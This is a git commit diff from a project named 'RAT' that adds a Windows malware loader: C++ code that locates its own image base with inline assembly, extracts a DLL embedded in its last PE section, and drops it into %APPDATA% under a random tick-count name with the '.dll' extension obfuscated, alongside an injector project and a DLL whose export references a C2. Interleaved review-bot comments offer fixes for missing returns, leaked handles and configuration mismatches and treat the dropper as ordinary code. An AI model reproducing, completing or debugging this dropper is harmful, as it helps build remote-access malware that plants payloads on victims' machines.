Changed a lot of things. Added a loader for extracting the payload onto the system

This commit is contained in:
hellisabove
2023-07-03 15:32:13 +03:00
parent 0969e96a55
commit 9f4a57720b
69 changed files with 406 additions and 63 deletions
+13
@@ -0,0 +1,13 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
+7
@@ -0,0 +1,7 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
+2
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
+15
@@ -0,0 +1,15 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
+31 -33
@@ -21,17 +21,18 @@
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{c7e129b4-8a7e-4e5c-a259-573609675fed}</ProjectGuid>
<RootNamespace>RAT</RootNamespace>
<ProjectGuid>{0299d361-d3f7-419a-ab93-fb36642c97fa}</ProjectGuid>
<RootNamespace>Dll</RootNamespace>
<WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
<ProjectName>FunDLL</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
@@ -41,18 +42,17 @@
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@@ -72,18 +72,25 @@
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<FunctionLevelLinking>true</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
@@ -106,21 +113,13 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<OmitFramePointers>false</OmitFramePointers>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<MinimumRequiredVersion>5.01</MinimumRequiredVersion>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -128,16 +127,15 @@
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<MinimumRequiredVersion>5.02</MinimumRequiredVersion>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
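Review bot: The Debug|x64 and Release|x64 groups of this project are switched to `<ConfigurationType>Application</ConfigurationType>` with `_CONSOLE` and `<SubSystem>Console</SubSystem>`, while Debug|Win32 becomes `DynamicLibrary` with `_USRDLL;RAT_EXPORTS`; the project's only visible source is the DllMain/FunEntry file, which defines no `main`, so the x64 configurations cannot link as a console application and, if they did, would not produce the DLL artifact the solution expects. Either mirror the Win32 `DynamicLibrary` settings in both x64 groups or remove the x64 configurations from this project and the solution so the inconsistent variants cannot be selected. Separately, the Debug|Win32 ClCompile group now defines `NDEBUG` with `<Optimization>MaxSpeed</Optimization>` and `<SDLCheck>false</SDLCheck>`, which contradicts the configuration name and will mislead anyone stepping through the Debug build; a comment in the group, or renaming it, would make the intent explicit.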
+1 -2
@@ -12,9 +12,8 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break;
}
return 1;
}
extern "C" __declspec(dllexport) int FunEntry() {
return MessageBoxA(0, "Hello World From C2", 0, 0);
return MessageBoxA(0, "Hello from C2", 0, 0);
}
@@ -0,0 +1,13 @@
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\debug\injector.exe
c:\users\hellisabove\source\repos\rat\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog
+11
@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
+2
@@ -0,0 +1,2 @@
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
@@ -0,0 +1 @@
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj
@@ -0,0 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
+3 -3
@@ -35,9 +35,9 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
@@ -127,7 +127,7 @@
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="Source.cpp" />
<ClCompile Include="injector.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
+1 -1
@@ -15,7 +15,7 @@
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Source.cpp">
<ClCompile Include="injector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
@@ -1,12 +0,0 @@
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.idb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\source.obj
c:\users\hellisabove\source\repos\rat\x64\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\x64\debug\injector.exe
c:\users\hellisabove\source\repos\rat\x64\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.write.1.tlog
-2
@@ -1,2 +0,0 @@
Source.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\x64\Debug\Injector.exe
+11
@@ -0,0 +1,11 @@
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj
c:\users\hellisabove\source\repos\rat\debug\loader.exe
c:\users\hellisabove\source\repos\rat\debug\loader.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog
+2
@@ -0,0 +1,2 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
+165
@@ -0,0 +1,165 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{81f05638-72b8-41da-b80a-4f292961d9a1}</ProjectGuid>
<RootNamespace>Loader</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<OmitFramePointers>true</OmitFramePointers>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<OmitFramePointers>true</OmitFramePointers>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>
</EntryPointSymbol>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<OmitFramePointers>true</OmitFramePointers>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="loader.cpp" />
<ClCompile Include="tools.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="tools.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
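Review bot: `<WarningLevel>TurnOffAllWarnings</WarningLevel>` in the Debug|Win32, Release|Win32 and Release|x64 ClCompile groups suppresses the compiler's not-all-paths-return diagnostics, which is why the missing return statements in the accompanying loader.cpp and tools.cpp hunks go unreported; `<WarningLevel>Level3</WarningLevel>` would surface them. The Debug|Win32 group also defines `NDEBUG` with `MaxSpeed`, `OmitFramePointers` and `BufferSecurityCheck` set to false, so the configuration named Debug is in effect an optimized release build and should be renamed or commented accordingly. The Debug|x64 group uses `_CONSOLE` and `<SubSystem>Console</SubSystem>` although the source uses WinMain rather than main, and the `<EntryPointSymbol>` element in Release|Win32 is empty and can be dropped.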
+30
@@ -0,0 +1,30 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="loader.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="tools.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="tools.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
+4
@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
+23
@@ -0,0 +1,23 @@
#include <Windows.h>
#include "tools.h"
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
// move payload onto %appdata% with some random generated name
DWORD bytes_written = NULL;
WCHAR appdata_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%APPDATA%"), appdata_path, MAX_PATH - 1) > 0) {
wsprintfW(appdata_path, TEXT("%s\\%lu.%cl%c"), appdata_path, GetTickCount(), 'd', 'l');
HANDLE new_file = CreateFileW(appdata_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
}
}
}
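Review bot: WinMain is declared to return `INT` but no path returns a value, which is undefined behaviour in C++ and is hidden here only because the project compiles with all warnings off; add `return 0;` as the last statement. The `new_file` handle opened by CreateFileW is never released; `CloseHandle(new_file);` after the WriteFile call closes the leak rather than relying on process exit. The two comments on the extraction step say the same thing twice in slightly different words; keeping one, e.g. `// copy the embedded section to a file under %APPDATA% named after the tick count`, documents the intent without the repetition.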
+36
@@ -0,0 +1,36 @@
#include "tools.h"
#include <Windows.h>
PVOID Tools::GetImageBase() {
PWORD virtual_address = PWORD(&GetImageBase);
PDWORD image_base = NULL;
__asm {
mov eax, virtual_address
and eax, 0xFFFF0000
IterateImage:
cmp WORD PTR[eax], 0x5A4D
je EndIteration
sub eax, 0x00010000
jmp IterateImage
EndIteration:
mov[image_base], eax
}
return image_base;
}
PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) {
PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base);
if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew);
if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) {
PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers));
PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1);
if (dll_section != ERROR) {
*module_size = dll_section->Misc.VirtualSize;
return RtlOffsetToPointer(module_base, dll_section->VirtualAddress);
}
}
}
}
